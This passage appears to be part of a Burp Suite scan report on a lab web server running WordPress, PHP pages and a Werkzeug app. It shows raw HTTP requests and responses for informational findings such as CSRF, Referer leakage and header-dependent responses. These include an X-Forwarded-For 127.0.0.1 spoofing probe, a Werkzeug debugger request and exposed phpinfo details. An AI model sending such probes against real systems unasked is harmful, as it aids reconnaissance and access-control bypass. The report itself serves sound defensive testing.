Content-Length: 2684
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
3.2.2. http://10.250.200.5:81/login
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://10.250.200.5:81
Path:   /login

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

password=&username=

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:05 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 914
Connection: close
Content-Type: text/html; charset=UTF-8

ERROR username or password blank<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<li
...[SNIP]...

Request 2

POST /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://aGwlKHW.5:81:81/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

password=&username=

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:18 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 914
Connection: close
Content-Type: text/html; charset=UTF-8

ERROR username or password blank<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<li
...[SNIP]...
3.2.3. http://10.250.200.5:81/search
Previous  Next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://10.250.200.5:81
Path:   /search

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

query=555-555-0199@example.com

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:40 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2254
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font
...[SNIP]...

Request 2

POST /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://ELmMbZz.5:81:81/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+

query=555-555-0199@example.com

Response 2

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:53:21 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2254
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font
...[SNIP]...
3.3. X-Forwarded-For dependent response
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Issue description

Application responses may depend systematically on the presence or absence of an X-Forwarded-For header in requests. This behavior does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Some applications enforce access controls based on the remote IP address of the connecting client. For example, an application might expose administrative functionality only to clients connecting from the local IP address of the server. In some configurations, the presence of an X-Forwarded-For header misleads the application about the client's IP address, allowing an attacker to masquerade as a trusted user. You should review the purpose of the relevant functionality to determine whether this might be the case.

Issue remediation

The X-Forwarded-For header is not a robust foundation on which to build any security measures, such as access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to spoofing.

If the platform application server returns incorrect information about the client's IP address due to the presence of an X-Forwarded-For header, then the server may need to be reconfigured, or an alternative method of identifying clients should be used.

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
<tr><td class="e">SERVER_SIGNATURE </td><td class="v">&lt;address&gt;Apache/2.4.10 (Debian) Server at 10.250.200.5 Port 81&lt;/address&gt;
</td></tr>
<tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.10 (Debian) </td></tr>
<tr><td class="e">SERVER_NAME </td><td class="v">10.250.200.5 </td></tr>
<tr><td class="e">SERVER_ADDR </td><td class="v">172.18.0.6 </td></tr>
<tr><td class="e">SERVER_PORT </td><td class="v">81 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">10.250.100.116 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>no value</i> </td></tr>
<tr><td class="e">CONTEXT_DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">SERVER_ADMIN </td><td class="v">webmaster@localhost </td></tr>
<tr><td class="e">SCRIPT_FILENAME </td><td class="v">/var/www/html/redirect.php </td></tr>
<tr><td class="e">REMOTE_PORT </td><td class="v">53679 </td></tr>
<tr><td class="e">GATEWAY_INTERFACE </td><td class="v">CGI/1.1 </td></tr>
<tr><td class="e">SERVER_PROTOCOL </td><td class="v">HTTP/1.1 </td></tr>
<tr><td class="e">REQUEST_METHOD </td><td class="v">GET </td></tr>
<tr><td class="e">QUERY_STRING </td><td class="v">orig=/phpinfo.php/ </td></tr>
<tr><td class="e">REQUEST_URI </td><td class="v">/phpinfo.php/ </td></tr>
<tr><td class="e">SCRIPT_NAME </td><td class="v">/phpinfo.php/ </td></tr>
</table>
<h2>HTTP Headers Information</h2>
<table>
<tr class="h"><th colspan="2">HTTP Request Headers</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php/ HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">10.250.200.5:81 </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* </td></tr>
<tr><td class="e">Accept-Language </td><td class="v">en </td></tr>
<t
...[SNIP]...

Request 2

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check
X-Forwarded-For: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:00 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="e">HTTP_X_FORWARDED_FOR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
<tr><td class="e">SERVER_SIGNATURE </td><td class="v">&lt;address&gt;Apache/2.4.10 (Debian) Server at 10.250.200.5 Port 81&lt;/address&gt;
</td></tr>
<tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.10 (Debian) </td></tr>
<tr><td class="e">SERVER_NAME </td><td class="v">10.250.200.5 </td></tr>
<tr><td class="e">SERVER_ADDR </td><td class="v">172.18.0.6 </td></tr>
<tr><td class="e">SERVER_PORT </td><td class="v">81 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">10.250.100.116 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>no value</i> </td></tr>
<tr><td class="e">CONTEXT_DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">SERVER_ADMIN </td><td class="v">webmaster@localhost </td></tr>
<tr><td class="e">SCRIPT_FILENAME </td><td class="v">/var/www/html/redirect.php </td></tr>
<tr><td class="e">REMOTE_PORT </td><td class="v">59370 </td></tr>
<tr><td class="e">GATEWAY_INTERFACE </td><td class="v">CGI/1.1 </td></tr>
<tr><td class="e">SERVER_PROTOCOL </td><td class="v">HTTP/1.1 </td></tr>
<tr><td class="e">REQUEST_METHOD </td><td class="v">GET </td></tr>
<tr><td class="e">QUERY_STRING </td><td class="v">orig=/phpinfo.php/ </td></tr>
<tr><td class="e">REQUEST_URI </td><td class="v">/phpinfo.php/ </td></tr>
<tr><td class="e">SCRIPT_NAME </td><td class="v">/phpinfo.php/ </td></tr>
</table>
<h2>HTTP Headers Information</h2>
<table>
<tr class="h"><th colspan="2">HTTP Request Headers</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php/ HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">10.250.200.5:81 </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* <
...[SNIP]...
3.4. User agent-dependent response
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue description

Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
<meta name='robots' content='noindex,follow' />
   </head>
   <body class="login login-action-login wp-core-ui locale-en-us">
       <div id="login">
       <h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Fairweather &#038; sons</a></h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
       <label for="user_login">Username or Email<br />
       <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
   </p>
   <p>
       <label for="user_pass">Password<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
   </p>
       <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Remember Me</label></p>
   <p class="submit">
       <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
       <input type="hidden" name="redirect_to" value="http://10.250.200.5/wp-admin/" />
       <input type="hidden" name="testcookie" value="1" />
   </p>
</form>

<p id="nav">
   <a href="http://10.250.200.5/wp-login.php?action=lostpassword">Lost your password?</a>
</p>

<script type="text/javascript">
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}

wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
</script>

   <p id="backtoblog"><a href="http://10.250.200.5/">&larr; Back to Fairweather &#038; sons</a></p>
   
   </div>

   
       <div class="clear"></div>
   </body>
   </html>
   

Request 2

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:01 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2256
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
<meta name='robots' content='noindex,follow' />
   <meta name="viewport" content="width=device-width" />
       </head>
   <body class="login login-action-login wp-core-ui mobile locale-en-us">
       <div id="login">
       <h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Fairweather &#038; sons</a></h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
       <label for="user_login">Username or Email<br />
       <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
   </p>
   <p>
       <label for="user_pass">Password<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
   </p>
       <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Remember Me</label></p>
   <p class="submit">
       <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
       <input type="hidden" name="redirect_to" value="http://10.250.200.5/wp-admin/" />
       <input type="hidden" name="testcookie" value="1" />
   </p>
</form>

<p id="nav">
   <a href="http://10.250.200.5/wp-login.php?action=lostpassword">Lost your password?</a>
</p>

<script type="text/javascript">
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}

wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
</script>

   <p id="backtoblog"><a href="http://10.250.200.5/">&larr; Back to Fairweather &#038; sons</a></p>
   
   </div>

   
       <div class="clear"></div>
   </body>
   </html>
   
3.5. Cross-domain Referer leakage
Previous  Next

There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behavior should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

Applications should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.



3.5.1. http://10.250.200.5/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request 1

GET /?s=555-555-0199@example.com HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:45:32 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9850

<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link rel="profile" href="http://gmpg.org/xfn/11">
       <script>
...[SNIP]...
</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com'>
<link rel='dns-prefetch' href='//s.w.org'>
<link rel="alternate" type="application/rss+xml" title="Fairweather &amp; sons &raquo; Feed" href="http://10.250.200.5/feed/" />
...[SNIP]...
</style>
<link rel='stylesheet' id='twentysixteen-fonts-css' href='https://fonts.googleapis.com/css?family=Merriweather%3A400%2C700%2C900%2C400italic%2C700italic%2C900italic%7CMontserrat%3A400%2C700%7CInconsolata%3A400&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='genericons-css' href='http://10.250.200.5/wp-content/themes/twentysixteen/genericons/genericons.css?ver=3.4.1' type='text/css' media='all' />
...[SNIP]...
<li><a href="https://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a>
...[SNIP]...
</span>
               <a href="https://wordpress.org/">Proudly powered by WordPress</a>
...[SNIP]...
3.5.2. http://10.250.200.5/wp-login.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request 1

GET /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/wp-login.php
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:11 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1866
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
</title>
   <link rel='dns-prefetch' href='//s.w.org'>
<link rel='stylesheet' href='http://10.250.200.5/wp-admin/load-styles.php?c=0&amp;dir=ltr&amp;load%5B%5D=dashicons,buttons,forms,l10n,login&amp;ver=4.6' type='text/css' media='all' />
...[SNIP]...
<h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Fairweather &#038; sons</a>
...[SNIP]...
3.5.3. http://10.250.200.5:81/sys2_test.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request 1

GET /sys2_test.php?test= HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
<td>
<a href="http://fairweathersons.local">http://fairweathersons.local</a>
...[SNIP]...
3.5.4. http://10.250.200.5:8080/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request 1

GET /?__debugger__=yes&cmd=paste HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:03 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/css/sb-admin-2.css">
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/metisMenu/2.7.0/metisMenu.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/startbootstrap-sb-admin-2/3.3.7+1/js/sb-admin-2.js"></script>
...[SNIP]...
3.5.5. http://10.250.200.5:8080/login
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:8080
Path:   /login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request 1

GET /login?pin=555-555-0199@example.com&btn=Confirm%2bPin HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/login
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
X-XSS-Protection: 0
Connection: close
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:52 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>KeyError: 'userNone_username' // Werkzeug Debugger</title>
<link
...[SNIP]...
<span
class="pastemessage">You can also paste this traceback into
a <a href="https://gist.github.com/">gist</a>
...[SNIP]...
3.6. Cross-domain script include
Previous  Next

There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

